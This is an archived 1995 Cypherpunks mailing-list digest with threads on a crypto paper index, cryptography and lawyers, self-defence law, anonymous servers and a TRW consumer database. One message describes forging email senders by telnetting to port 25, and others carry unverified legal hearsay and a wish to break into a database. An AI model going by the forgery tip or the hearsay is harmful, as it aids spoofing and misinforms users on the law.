(Granted, we are not following those other areas, necessarily.
But that other domains have not yet gone fully electronic is indicative that others see some of these same problems, and are likely to address them before the math/crypto community does.)

Sorry to dissect this proposal so thoroughly, but it's one of the things I do.

--Tim May

(P.S. The copyright problems can possibly be skirted by using anonymous remailers and offshore data havens in jurisdictions that will not raid the sites, or by message pools. But these are major steps, mostly untested. A "Scientology" site is probably a better test than a site with crypto papers. I wouldn't want to run either of them.)

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA         | knowledge, reputations, information markets,
Higher Power: 2^756839 | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From bianco at itribe.net Wed Sep 6 09:46:21 1995
From: bianco at itribe.net (David J. Bianco)
Date: Wed, 6 Sep 95 09:46:21 PDT
Subject: Searchable Crypto Paper Archive?
In-Reply-To:
Message-ID: <199509061642.MAA01932@gatekeeper.itribe.net>

On Sep 6, 9:36, Timothy C. May sent the following to the NSA's mail archives:
> Subject: Re: Searchable Crypto Paper Archive?

Thanks for the reply. I think there are a few misconceptions, though. I've responded in place to some of your comments...

||
|| It's an idea with some attraction. But some issues need discussing. Being
|| an analytical sort of person, prone to looking for flaws in ideas, I'll
|| mention a few:
||
|| 1. First and foremost, _copyright_ issues. Most articles are copyrighted
|| (automatically, by Berne Convention) and the permission of the authors must
|| be obtained. Authors may also collect royalties, or the conferences may, so
|| unlimited electronic distribution is a potential problem.
||
|| NASA can publish its reports (and those of other government agencies)
|| electronically because it has the copyrights, or the copyrights are free
|| and clear. Try putting someone's article on the Net without their
|| permission and look out.
||
|| Indeed, there are a couple of the most important papers on the soda archive
|| site, some of them scanned-in and OCRed by "The Information Liberation
|| Front." There are so few that the authors likely don't even know they are
|| there, or care. But try to put lots of copyrighted material on a site and
|| get ready for actions. Remember, most nations are party to the Berne
|| Convention(s).

Hmmm... I guess I didn't specifically mention this point since it seemed obvious to me, though I probably should have: Papers should come from the authors or the organization which holds the copyright. I wouldn't be in favor of accepting 3rd party submissions, for both copyright and authenticity/integrity issues.

||
|| 2. Many of the papers have complex typography, lots of equations and
|| diagrams. These reproduce poorly on most screens, and really need a new
|| level of display presentation. (Yes, I know about Adobe Acrobat, which I
|| have. Ditto for FrameMaker, and a few other such systems. But not many
|| others have them.)
||
|| I happen to know the ILF member who posted the Chaum "Dining
|| Cryptographers" paper, anonymously, and know that he picked that paper both
|| because of its importance to his interests and because it was pure text,
|| with no equations and no diagrams. This made it a natural for scanning.
||

The model we've used so far is that the format of the papers is independent of the bibliographic information which we index. For example, the NASA system I mentioned has papers in both HTML and Postscript formats. The abstracts (which are what's indexed) simply contain URLs, and don't really care what the document types are.
In my experience, most of the target audience for technical papers has access to a postscript previewer (for online viewing) and/or a postscript printer, so postscript tends to be the format of choice. Still, it can be anything; text, PDF, scanned in TIFF files all have worked for us in the past.

|| 3. In the crypto domain, the papers are much more conveniently concentrated
|| into a handful of conference proceedings, nearly all published by
|| Springer-Verlag. (Those great silvery-grey paperbacks.)
||
|| This point about Springer-Verlag relates to Item #1 above. Namely, that
|| copyright holders (Springer-Verlag, through publishing arrangements with
|| the conferences) will not take kindly to folks making the papers available
|| electronically.
||
|| This point, about the limited number of main crypto volumes, also implies
|| another point: many of these papers refer to other papers in the same
|| volume or set of volumes (e.g., papers in the "Crypto '93 Proceedings" will
|| refer to papers in that volume or earlier volumes). This makes it *even
|| more advantageous* for a serious researcher to buy the complete set of
|| volumes.
||

Now that's a pretty good point. Wonder if we could convince them to make their papers available electronically? 8-) But ignoring them, there still seem to be a fair amount of cryptography papers published as technical reports by individual authors or organizations. These would be what I'd like to see in CTRS.

|| 4. Authentication issues. Electronic versions of articles will need to be
|| signed, to prevent unauthorized modifications. The infrastructure for this
|| is beginning to build, but is clearly not available to many.
||
|| I am confident that someday most journals will be published electronically.
|| Many people think this likely, whether in 5 years or 15 years. Just too
|| many advantages.
||

Another good point, but I think this could easily be marked down as an issue to be worked on after the basic functionality is available.
I'd hate to see this as a reason for not doing something.

|| However--and this is my point--before that happens a huge amount of
|| negotiation about author's rights to reproduction, about verification of
|| copies, about royalty payments for copies, etc., has to happen. And, the
|| display software/hardware is not quite there yet....too many people would
|| be unable to see the equations and diagrams on the screen. In 5 years, less
|| of a problem.
||
|| Many authors make their papers available by anonymous ftp, or via the Web.
|| I think this is the way to do it: let those who feel their papers need
|| electronic dissemination do so. The author makes the choice.

This is exactly the target audience I'm looking for. When an author wants to put a paper up on his FTP or WWW site, I hope they'll also send me the indexing information so that when people want to find it, they can use CTRS. I'm not interested in actually storing a copy of the report, although I'm willing to do so if they cannot make it available any other way.

||
|| In summary, this project is probably premature (technologically), has
|| numerous copyright issues to be resolved, and is probably less needed in
|| the crypto community than in some other areas.
||
|| (Granted, we are not following those other areas, necessarily. But that
|| other domains have not yet gone fully electronic is indicative that others
|| see some of these same problems, and are likely to address them before the
|| math/crypto community does.)
||

I have to disagree strongly about the technologically premature part, since I have had a lot of experience to the contrary during my involvement with several major technical report systems. I'm afraid I also have to disagree with you about the need for this service. Having attempted to find some of the reports which I've heard are available on the Net, I'd have to say it's not a task I'd set an Internet novice to, or one I'd give to someone on a deadline.
I think a good bibliographic database like I propose in CTRS would be a definite help. And at the very very very least, it probably won't hurt. 8-)

|| Sorry to dissect this proposal so thoroughly, but it's one of the things I do.
||

S'ok with me. It's not like I'm dead set on doing this or anything. It's just an observation, and an offer of service if anyone thinks it'd be useful.

Oh, BTW, another thing I probably should mention that seems obvious to me: I'm offering to do this for free. That is, the database would be a public service, with no charge to list papers, add another database to the searching list or to query/retrieve abstracts.

-- 
==========================================================================
David J. Bianco                | Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.                   |
Suite 1700, World Trade Center | email:
Norfolk, VA 23510              | URL  : http://www.itribe.net/~bianco/

From cort at bioanalytical.com Wed Sep 6 09:54:06 1995
From: cort at bioanalytical.com (Cortland D. Starrett)
Date: Wed, 6 Sep 95 09:54:06 PDT
Subject: "Living in real time, side A" (article ref)
Message-ID: <199509061651.LAA00565@bioanalytical.com>

"Living in real time, side A" by Ted Lewis, Naval Postgraduate School, is an extremely concise (<3 pages) and insightful look into the future of information technology and society. Subjects dear to many cypherpunks are indirectly addressed throughout.

A detail of particular interest to the lawyers on the list described "A vapor trail of litigation". The author notes that, "Plea bargaining, out-of-court settlements, and appeals are the norm in Post-industrial legal circles. These are all legal devices for delaying the opposition rather than deciding on a proactive course of action. In the Info Age, legal procedures will be too cumbersome and too expensive to accommodate the rate of change." ... "The mechanisms for protecting Info Age property (information) are trade secrets and obsolescence."
other key terms: Moore's Law, civilization on speed, inverse economics, rate of change, Direct democracy tending toward anarchy...

The article can be found on page 8 of the September issue of IEEE Computer.

Cort.

(Mistakes in quotes are mine.)

From bianco at itribe.net Wed Sep 6 09:55:18 1995
From: bianco at itribe.net (David J. Bianco)
Date: Wed, 6 Sep 95 09:55:18 PDT
Subject: Searchable Crypto Paper Archive?
In-Reply-To: <199509061632.MAA00622@james.bwh.harvard.edu>
Message-ID: <199509061650.MAA01945@gatekeeper.itribe.net>

On Sep 6, 12:32, Adam Shostack sent the following to the NSA's mail archives:
> Subject: Re: Searchable Crypto Paper Archive?

|| | Anyway, this is what I'd like to see. I'm willing to work on such a
|| | system if there's enough positive feedback. Does anyone else think
|| | they'd like to use or contribute to such a system?
|| |
||
|| I think this would be a fabulously useful service, one which I'd be
|| glad to subscribe to as an amateur. (I could see forking over $20-50
|| for search priority, possibly more if it was really well done).
||

Ack! Money involved? "Just say no!" 8-)

When I said "contribute" I meant placing papers in it, or if you've got a lot already, adding your own database to the list of possible search sites. I wanna do this as a free service. There are several reasons (like I can't see charging people for information that I didn't even produce), but the real reason for doing it is simple: I wanna use it.

I made a mock up of CTRS, which is available at:

http://www.itribe.net/CTRS/
https://www.itribe.net/CTRS/ (of course we have to offer SSL 8-)

There aren't any crypto papers in it yet, though. The iTRiBE database (the only one available for searching right now) is filled with some NASA test data. Try doing searches on things like "ratio" or "nasa" for an example of the output you'd get.

||
|| Don't forget the value of sci.crypt[.research] and cypherpunks
|| postings, nor of crypto 'rump session' papers.
I admit I hadn't thought of these. I'm not sure I could sign up for the task of archiving the newsgroups (disk space) but if the authors/copyright holders of rump papers want to submit them, I'd be happy to index them. I don't think the database necessarily has to be composed only of refereed papers or anything. I'd be happy to index rump papers, technical reports or maybe even presentation materials like postscript copies of overhead transparencies.

Anyway, thanks for the reply!

-- 
==========================================================================
David J. Bianco                | Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.                   |
Suite 1700, World Trade Center | email:
Norfolk, VA 23510              | URL  : http://www.itribe.net/~bianco/

From tcmay at got.net Wed Sep 6 09:56:34 1995
From: tcmay at got.net (Timothy C. May)
Date: Wed, 6 Sep 95 09:56:34 PDT
Subject: Searchable Crypto Paper Archive?
Message-ID:

At 4:45 PM 9/6/95, David J. Bianco wrote:
>S'ok with me. It's not like I'm dead set on doing this or anything. It's
>just an observation, and an offer of service if anyone thinks it'd be
>useful.
>
>Oh, BTW, another thing I probably should mention that seems obvious to me:
> I'm offering to do this for free. That is, the database would be a public
>service, with no charge to list papers, add another database to the
>searching list or to query/retrieve abstracts.

I'll look forward to seeing this, then. I was just noting some issues which seem likely to arise. But if you plan to do this "if anyone thinks it'd be useful," then I think it would be useful, so you've met your criterion for doing the project.

Good luck! Keep us posted.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA         | knowledge, reputations, information markets,
Higher Power: 2^756839 | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From cort at bioanalytical.com Wed Sep 6 10:11:51 1995
From: cort at bioanalytical.com (Cortland D. Starrett)
Date: Wed, 6 Sep 95 10:11:51 PDT
Subject: cryptography eliminates lawyers?
Message-ID: <199509061709.MAA00612@bioanalytical.com>

As a follow-up to the article reference I posted, I pose the following question:

Will cryptographic technology and information (communication) technology reduce the need for legal services in the future? (especially regarding contracts, buying/selling, patent law, etc.) Will legal services just look different? Will they be more efficient (cheaper)?

Put bluntly, will cryptography put lawyers out of business?

Any comments would be appreciated.

Cort.

From robl at on-ramp.ior.com Wed Sep 6 10:40:34 1995
From: robl at on-ramp.ior.com (Rob Lowry)
Date: Wed, 6 Sep 95 10:40:34 PDT
Subject: cryptography eliminates lawyers?
In-Reply-To: <199509061709.MAA00612@bioanalytical.com>
Message-ID:

> Will cryptographic technology and information (communication)
> technology reduce the need for legal services in the future?
> (especially regarding contracts, buying/selling, patent law, etc.)
> Will legal services just look different? Will they be more
> efficient (cheaper)?
>
> Put bluntly, will cryptography put lawyers out of business?

I certainly expect the world of business to change and reflect the use of cryptographic tech as soon as it becomes an acceptable practice to use it. This may take a while as the media and current administration continue to paint black anyone who wants to use such tech for any reason.

Should there come a time, however, when crypto is a fashionable and accepted thing, I would expect to see law offices offering to send and receive documents using such tech, as well as generating and maintaining keys off-site for clients. With such a legal hoopla being made over crypto, I can not fathom lawyers not getting in on the action..
While the need for lawyers may decline with the increased use of crypto, I do not think they are about to become an endangered species. Those that are smart will find a way to profit from it, while those that can not adapt will be left behind (and who says lawyers are not part of evolution )

RobL

From tedwards at src.umd.edu Wed Sep 6 10:54:06 1995
From: tedwards at src.umd.edu (Thomas Grant Edwards)
Date: Wed, 6 Sep 95 10:54:06 PDT
Subject: Are booby-trapped computers legal?
In-Reply-To: <199509060419.XAA04296@einstein.ssz.com>
Message-ID:

On Tue, 5 Sep 1995, Jim Choate wrote:
> As far as I know the owner of property has no legal right to kill a person
> either trespassing or stealing it in any of the 50 states. There was a
> recent federal ruling that basically says that if you meet a burglar in your
> home at nite you can not kill or otherwise harm them unless your life is
> directly threatened. In short, you MUST give up the ground if at all
> possible.

In Maryland you have the responsibility to retreat if possible when confronted by someone threatening your life or limb. If you are unable to retreat or are in your domicile (or motel room, etc.) you have the right to use deadly force to stop an attack.

You certainly do not have the right to use deadly force against someone for any other reason than immediate threat of life or limb to you or someone else.

-Thomas

From tedwards at src.umd.edu Wed Sep 6 10:56:41 1995
From: tedwards at src.umd.edu (Thomas Grant Edwards)
Date: Wed, 6 Sep 95 10:56:41 PDT
Subject: Anonymous CU-SeeMe reflector
Message-ID:

If anybody has worked on or is interested in working on creating an anonymous CU-SeeMe reflector, please contact me (where anonymous in this case means that CU-SeeMe clients do not report the proper IP numbers of other clients). I've done a bit of work on it but can't quite get "normal" reflector behaviour.
-Thomas Edwards

From dlambert at aigtc.com Wed Sep 6 11:36:35 1995
From: dlambert at aigtc.com (Dave Lambert)
Date: Wed, 6 Sep 95 11:36:35 PDT
Subject: Anonymous http daemon?
Message-ID: <199509061821.OAA01040@ptolemy>

Hi.

Some time ago, there were some discussions concerning an anonymous http daemon. As far as I can recall, the discussion just sort of trailed off, and nothing got implemented.

I'm considering making an anonymous server available, and would like:

1. to know whether I need to hack some code (or if someone has done so already)

2. to reopen the discussion of the desirable characteristics such a beast would possess.

- David C. Lambert
dlambert at aigtc.com

From alt at iquest.net Wed Sep 6 11:39:07 1995
From: alt at iquest.net (Al Thompson)
Date: Wed, 6 Sep 95 11:39:07 PDT
Subject: Growth of actions defined as crime. Which math formula?
Message-ID:

At 02:00 AM 9/6/95 -0400, Black Unicorn wrote:
>Created crimes are few and far between.

You mean like buying a 30 round magazine, or putting a different stock of your choice on a rifle, or owning an automatic weapon, or mailing crypto out of the country, or hiring someone due to their race, or not hiring someone because they are "fat?"

From robl at on-ramp.ior.com Wed Sep 6 11:56:50 1995
From: robl at on-ramp.ior.com (Rob Lowry)
Date: Wed, 6 Sep 95 11:56:50 PDT
Subject: cryptography eliminates lawyers?
In-Reply-To: <199509061834.NAA27747@freeside.fc.net>
Message-ID:

> Rob,
>
> re: Will Cryptography put lawyers out of business?
>
> I see no connection between the use/non-use of crypto and the
> occurrence/non-occurrence of the conflicts and threats of conflicts
> which give rise to the use of lawyers. What's the connection?

I know from my employer's perspective, that lawyers are retained for more than just litigation. Often they handle the exchange of critical documents and transactions that need to be kept confidential.
The impact of crypto as I see it is a reduction in the use of legal services of this nature, not in litigation. Using a lawyer to pass on tech specs on a new product to the patent office is a common occurrence, as it is assumed that the lawyer can maintain the secrecy required for handling these documents. Should the patent office offer a key, you could just as easily send an encrypted message in place of a lawyer handling this.

There are bound to be other options and opportunities as well for lawyers to use crypto.. securing a company's documents or whatever.

RobL

From robl at on-ramp.ior.com Wed Sep 6 12:06:02 1995
From: robl at on-ramp.ior.com (Rob Lowry)
Date: Wed, 6 Sep 95 12:06:02 PDT
Subject: Are booby-trapped computers legal?
In-Reply-To:
Message-ID:

> > As far as I know the owner of property has no legal right to kill a person
> > either trespassing or stealing it in any of the 50 states. There was a
> [...]
> In Maryland you have the responsibility to retreat if possible when
[...]
> You certainly do not have the right to use deadly force against someone
> for any other reason than immediate threat of life or limb to you or
> someone else.

Being a freedom loving, gun owner, with an interest in maintaining both my rights to guns, and my right to crypto, I am saddened to see that you have to retreat at all. As far as I am concerned, if I am in my house, and someone uninvited is in there also (burglar/thief/psycho/whatever) then I have already sufficiently retreated.. and they will likely be shot. Anyone invading my home is considered a threat to my wife, children and myself.

I had heard that in the state of Texas, intruders/trespassers are at their own risk after sundown, as it is legal to fire upon them at that point, regardless of their intent.. I have not been able to confirm this, as of yet.. but am looking for the answer in my meager spare time.

RobL

From tcmay at got.net Wed Sep 6 12:18:09 1995
From: tcmay at got.net (Timothy C.
May)
Date: Wed, 6 Sep 95 12:18:09 PDT
Subject: Growth of actions defined as crime. Which math formula?
Message-ID:

At 6:32 PM 9/6/95, Al Thompson wrote:
>At 02:00 AM 9/6/95 -0400, Black Unicorn wrote:
>
>>Created crimes are few and far between.
>
>You mean like buying a 30 round magazine, or putting a different
>stock of your choice on a rifle, or owning an automatic weapon,
>or mailing crypto out of the country, or hiring someone due to their
>race, or not hiring someone because they are "fat?"

Or drinking alcohol, or owning gold, or possessing a copy of a Traci Lords video, or selling bullets recently declared illegal, or having a "men only" gym (but "women only" gyms are legal), or making condoms available, or not making condoms available, or teaching women how to use birth control, or denying a Satanist a job at a child care center on the basis of his religious beliefs, and so on. Too many transient, created crimes.

To answer Lucky's original question, one way to measure the total number of new laws--most of them covering "created crimes"--is to measure the total number of volumes of statutes at the Federal, state, and local levels. I've seen figures on the "linear feet" of regulations, and how they are growing exponentially, but I don't recall the numbers. Something like the total number of laws doubling every 10 years or so, but don't quote me on this one.

Whether these are "created crimes" in most cases is unclear, but certainly the really basic crimes (murder, assault, rape, theft, etc.) were adequately covered 20 years ago, or 50 years ago, etc. I can see some reasons for refining the definitions in the light of new situations, but I have to conclude that _most_ of the vast number of new laws and statutes deal with "created crimes," as I understand the term.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C.
May         | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA         | knowledge, reputations, information markets,
Higher Power: 2^756839 | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From hallam at w3.org Wed Sep 6 12:39:50 1995
From: hallam at w3.org (hallam at w3.org)
Date: Wed, 6 Sep 95 12:39:50 PDT
Subject: Are booby-trapped computers legal?
In-Reply-To:
Message-ID: <9509061938.AA02249@zorch.w3.org>

Under UK law it is certainly illegal to create any device with the intention of causing grievous bodily harm to anyone. The right to self defense is very precisely that, the right to take reasonable steps to defend yourself with commensurate force if attacked. If someone hits you in the face you do not have the right to kill him. If someone tries to do serious harm to you and the only way to avoid that harm is to kill them that is self defense. There is no self defense argument where the purpose is not to prevent physical harm.

Any device intended to cause harm to someone tampering with a computer could well land the perpetrator in jail for a very long time for attempted murder or murder.

People who go round drawing parallels to gun ownership and cryptography ownership are simply playing into the government's hands. Cryptography has net benefits to society. Most advocates of gun ownership tend to convince me of little more than they are a danger to society. Regardless of their case they are the biggest argument for gun control, and therefore poor advocates of their cause. I see their attempts to draw parallels with cryptography to be little more than trying to shore up their sinking ship with one that's afloat.

Phill

From dsc at swcp.com Wed Sep 6 12:52:37 1995
From: dsc at swcp.com (Dar Scott)
Date: Wed, 6 Sep 95 12:52:37 PDT
Subject: cryptography eliminates lawyers?
Message-ID:

Cort Starrett wrote,
>Put bluntly, will cryptography put lawyers out of business?

Even in a cryptoanarchy I would want to treat customers kindly and I would want to make sure that in any agreement both parties are clear as to when we are complying or not. A lawyer might help in complex cases. Especially if UCC is referenced. And in some kinds of escrow a "judge" might be invoked if there is a dispute. The judge might be a lawyer or might bring in a lawyer as an expert.

The nature of the work of a lawyer in a cryptoanarchy might be very different. Lawyers might even become highly respected and liked!

Dar (list newbie)

===========================================================
Dar Scott                        Home phone: +1 505 299 9497
Dar Scott Consulting             Voice:      +1 505 299 5790
8637 Horacio Place NE            Email: darscott at aol.com
Albuquerque, NM 87111                   dsc at swcp.com
                                 Fax:        +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
===========================================================

From sandfort at crl.com Wed Sep 6 12:52:47 1995
From: sandfort at crl.com (Sandy Sandfort)
Date: Wed, 6 Sep 95 12:52:47 PDT
Subject: cryptography eliminates lawyers?
In-Reply-To: <199509061709.MAA00612@bioanalytical.com>
Message-ID:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Wed, 6 Sep 1995, Cortland D. Starrett wrote:

> Will cryptographic technology and information (communication)
> technology reduce the need for legal services in the future?
> (especially regarding contracts, buying/selling, patent law, etc.)
> Will legal services just look different? Will they be more
> efficient (cheaper)?

The U.S. legal system is in free fall, and lawyers are almost totally to blame. ("Lawyers" as used here includes all judges and most legislators.) This does not mean, however, that cryptographic/information/communications technologies can forgo the use of advocates and arbitrators. There will always be a place for people who can fulfill these functions. They may or may not be called lawyers, but most of the same folks who now go into law will be the dispute specialists of cyberspace.

S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From scottg at b4a206.mdc.com Wed Sep 6 13:28:28 1995
From: scottg at b4a206.mdc.com (TECO Master)
Date: Wed, 6 Sep 95 13:28:28 PDT
Subject: Where is Secure Drive 1.4?
Message-ID: <95090613224714@b4a206.mdc.com>

-----BEGIN PGP SIGNED MESSAGE-----

Hi Folks,

I have a previous version of SecureDevice (v1.3). Is v1.4 the current version or something higher? Where is an FTP site so I can grab it?

TIA,

scott gallaher        | I believe in the 1st Amendment.
TECO Master & DBA     | Pornography is just a fringe benefit.
PGP Key fingerprint: AD A8 C9 AA D7 D3 6A E3 0C 58 5A 10 41 37 45 EE
GCS d- s+: a C++++ U->L++++ P? L>+++ !E[teco+++] W N++ k- w--- !O M- V$ PS+ PE Y++ PGP(++) t+ !5 X R(++) tv+ b++(+++) DI+ !D G e++ h----(*) r+++ y++++(++*) -- Geek Code V3.0

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBME4SV9PstJd5R1NxAQFN9wH/UYh59UzgBKotUs/HDYJ7jHEPlcmOIy/E
Zo74KQcSb9QtaPMntSpHiZq3W1ZaIRrl+jx9HkZbsBbXHRVi7+HGXQ==
=xvbE
-----END PGP SIGNATURE-----

From cg at bofh.lake.de Wed Sep 6 13:29:12 1995
From: cg at bofh.lake.de (Cees de Groot)
Date: Wed, 6 Sep 95 13:29:12 PDT
Subject: Scientology and police visit XS4ALL Amsterdam
Message-ID:

> This is the second or third time I've seen descriptions of such
> raids where cult (no, I'm not trying to be diplomatic)
> representatives were present and participating. Is this legal in
> Amsterdam? How about in the U.S.? Britain?
>
Probably. Amsterdam isn't exactly the wild west, and they didn't take the computer equipment with them, they just inventoried everything so as to have something to sell when their claims prove valid. Which I doubt (shit, I will be moving to this country in a couple of weeks...)
> If a police officer has a warrant then I really don't have much
> choice about letting him in. Am I also under an obligation to
> allow the people who filed for the warrant into my home or
> business?
>
I don't know whether this is valid. I assume so.

I also think it is about time we develop some ideas about anonymous web publishing. Probably some chained cgi scripts could do, but how to get around traffic analysis?

--
Cees de Groot, OpenLink Software
262ui/2048: ID=4F018825 FP=5653C0DDECE4359D FFDDB8F7A7970789 [Key on servers]
http://www.lake.de/sonst/homepages/s2449/index.html

From dneal at usis.com Wed Sep 6 13:51:15 1995
From: dneal at usis.com (David Neal)
Date: Wed, 6 Sep 95 13:51:15 PDT
Subject: Collection of personal info
Message-ID:

I sent this to the risks moderator some time back, but I guess he didn't like it. For those of you who think that perhaps people advocating cybercash are just a bunch of paranoid lunatics.

--------------

As advertised in the trade magazine "DM News" (Direct Marketing News), Apr. 24, 1997, V. 17 N. 16. I've typed the entire text of the advertisement, any typos are mine.

From the huge number of people in the database, it would seem that TRW is now marketing a subset of the credit records they keep on everyone. Does anyone else remember the flap over Lotus' product (Magellan) that was going to allow something similar?

The risks? This is the perfect database if you want to red-line your offerings. I'm sure others will have more creative answers.

--------------

TRW DISCOVERED

Some very smart people are uncovering exciting ways to increase response rates, find profitable customers, and develop new market niches. It's been a well kept secret. Now it's out. It's TRW.

It all started with the search for more creative information solutions. Solutions that help you discover hidden markets and unique ways of using ordinary data to target qualified prospects. The result: a proven and massive database in the hands of people with real data management know-how.

So far the findings have revealed:

o A database of 170+ million consumers
o 100+ demographic, psychographic and geographic selects
o A full range of computer services.
o Comprehensive motor vehicle data

From this comes an array of products and services to intrigue even the most seasoned direct marketer. One of these is called the TRW Smart Targeting Tools (SM). It links 98 million households with the goods and services they are most likely to buy. Choose consumer names by 50 neighborhood or 3600 household level clusters, by 56 broad product categories or by 516 specific product or brand preferences.

Looking at all the advantages, TRW may be the direct marketer's find of this century. And the next.

Energize your marketing. Contact your TRW representative or call 800.527.3933 Ext 640. You have a great find ahead of you.

TRW Target Marketing Services
Your one source for reaching all the right people.
701 TRW Parkway
Allen, TX 75002-3717
800.527.3933

David Neal - GNU Planet Aerospace 1-800-PLN-8-GNU
Unix, Sybase and Networking consultant.
"...you have a personal responsibility to be pro-active in the defense of your own civil liberties." - S. McCandlish

From bdolan at use.usit.net Wed Sep 6 14:18:30 1995
From: bdolan at use.usit.net (Brad Dolan)
Date: Wed, 6 Sep 95 14:18:30 PDT
Subject: booby-traps, crypto, guns, and tea
In-Reply-To: <9509061938.AA02249@zorch.w3.org>
Message-ID:

On Wed, 6 Sep 1995 hallam at w3.org wrote:

>
> Under UK law it is certainly illegal to create any device with the
> intention of causing grievous bodily harm to anyone. The right to self
> defense is very precisely that, the right to take reasonable steps to
> defend yourself with commensurate force if attacked.

[...]

>
> People who go round drawing parallels to gun ownership and cryptography
> ownership are simply playing into the government's hands. Cryptography has net
> benefits to society.
> Most advocates of gun ownership tend to convince me of
> little more than they are a danger to society. Regardless of their case they are
> the biggest argument for gun control, and therefore poor advocates of their
> cause. I see their attempts to draw parallels with cryptography to be little
> more than trying to shore up their sinking ship with one that's afloat.
>
>
> Phill
>

King George didn't like us owning guns either. I'm pleased my ancestors had a difference of opinion with him concerning this and a few other things.

Brad

From tms at TIS.COM Wed Sep 6 14:34:39 1995
From: tms at TIS.COM (Thomas M. Swiss)
Date: Wed, 6 Sep 95 14:34:39 PDT
Subject: Collection of personal info
In-Reply-To:
Message-ID: <199509062125.RAA10123@ziggy.tis.com>

David Neal writes:

>I sent this to the risks moderator some time back, but I guess
>he didn't like it.

I can guess why; PGN might be skeptical of your precognitive powers. B->

>...
>As advertised in the trade magazine "DM News" (Direct Marketing News),
>Apr. 24, 1997, V. 17 N. 16. I've typed the entire text of the advertisement,
         ^^^^

-Tom Swiss / tms at tis.com

From dneal at usis.com Wed Sep 6 14:44:05 1995
From: dneal at usis.com (David Neal)
Date: Wed, 6 Sep 95 14:44:05 PDT
Subject: Collection of personal info
In-Reply-To: <199509062125.RAA10123@ziggy.tis.com>
Message-ID:

On Wed, 6 Sep 1995, Thomas M. Swiss wrote:

>
> David Neal writes:
>
> >I sent this to the risks moderator some time back, but I guess
> >he didn't like it.
>
> I can guess why; PGN might be skeptical of your precognitive powers. B->
>
> >...
> >As advertised in the trade magazine "DM News" (Direct Marketing News),
> >Apr. 24, 1997, V. 17 N. 16. I've typed the entire text of the advertisement,
>          ^^^^

Well, I did say all typos were _mine_ -- That's 1995 folks, just for the record, and thanks to Tom Swiss for being the first in a long line of people who will point this out. :-)

But back to the topic; am I the only one who gets the willies just reading this?

From adam at bwh.harvard.edu Wed Sep 6 14:57:13 1995
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Wed, 6 Sep 95 14:57:13 PDT
Subject: Collection of personal info
In-Reply-To:
Message-ID: <199509062144.RAA05718@cushing.bwh.harvard.edu>

| But back to the topic; am I the only one who gets the willies just
| reading this?

No. But the interesting question is, what to do about it?

The answer in part, is personal anonymity through cash and avoiding US IDs. But in the long run, that's broken. You can't have privacy for 1000 people; they'll just toss us all in jail.

In the long run, we need to convince most Americans that their freedom is worth more than the Drug War. The only way to do that is to look and sound reasonable, and convince people a few at a time. Do it with letters to the editor, editorials, articles for your local newspaper, discussions on the street. Try not to rant; if you sound like a nut, people dismiss your ideas along with you. Be reasonable and measured. Use a spell checker. Stick to one idea, and give a few backing points. Don't insult your opponent. Don't try for a convoluted closing or slogan.

(This isn't to disparage the creation of new facts, like an international remailer network. I am saying that the problems are as much political as technological.)

Adam

--
"It is seldom that liberty of any kind is lost all at once." -Hume

From robl at on-ramp.ior.com Wed Sep 6 15:16:06 1995
From: robl at on-ramp.ior.com (Rob Lowry)
Date: Wed, 6 Sep 95 15:16:06 PDT
Subject: Collection of personal info
In-Reply-To:
Message-ID:

> Well, I did say all typos were _mine_ -- That's 1995 folks, just for the
> record and thanks to Tom Swiss for being the first in a long line
> of people who will point this out. :-)

-would you expect anything less from us?

>
> But back to the topic; am I the only one who gets the willies just
> reading this?

Beyond having the willies.. This is more than just scary, it feels like rape when you think about it for a while.
Everything you buy, on credit, is recorded and sold to someone who wants to know your secrets. Every time you make a banking transaction, someone is watching and compiling the data.

Is there any legal recourse to get your name removed from the sellable list? Or is it too late and we can not save even the vestiges of our privacy?

Oh, but if only I had the 'hacker' skill to break into such a database.. I have always been against the destruction of data.. but there are exceptions...

RobL

From loki at obscura.com Wed Sep 6 15:51:05 1995
From: loki at obscura.com (Lance Cottrell)
Date: Wed, 6 Sep 95 15:51:05 PDT
Subject: Direct Socket to Remailer?
Message-ID:

At 11:41 PM 9/3/95, starrd at iia2.org wrote:
>On Fri, 1 Sep 1995, Lance Cottrell wrote:
>
>> You should try the telnet port 25 trick. It is amazingly simple (but not
>> secure). Just "telnet some.machine.com 25" and type help. It will guide you
>> through it. It is quite informative.
>
>Be sure to test it first, sometimes it records who *really* sent it as
>well as the "forged" return address.
>
>Test it by mailing to yourself and then look at all the headers.
>

I should have been more clear. I was advocating this as interesting and educational, not as an effective anonymity technique.

-Lance

----------------------------------------------------------
Lance Cottrell   loki at obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche
----------------------------------------------------------

From tcmay at got.net Wed Sep 6 16:09:51 1995
From: tcmay at got.net (Timothy C. May)
Date: Wed, 6 Sep 95 16:09:51 PDT
Subject: Collection of personal info
Message-ID:

At 8:39 PM 9/6/95, David Neal wrote:
>From the huge number of people in the database, it would seem that TRW
>is now marketing a subset of their credit records they keep on everyone.
>Does anyone else remember the flap over Lotus' product (Magellan) that
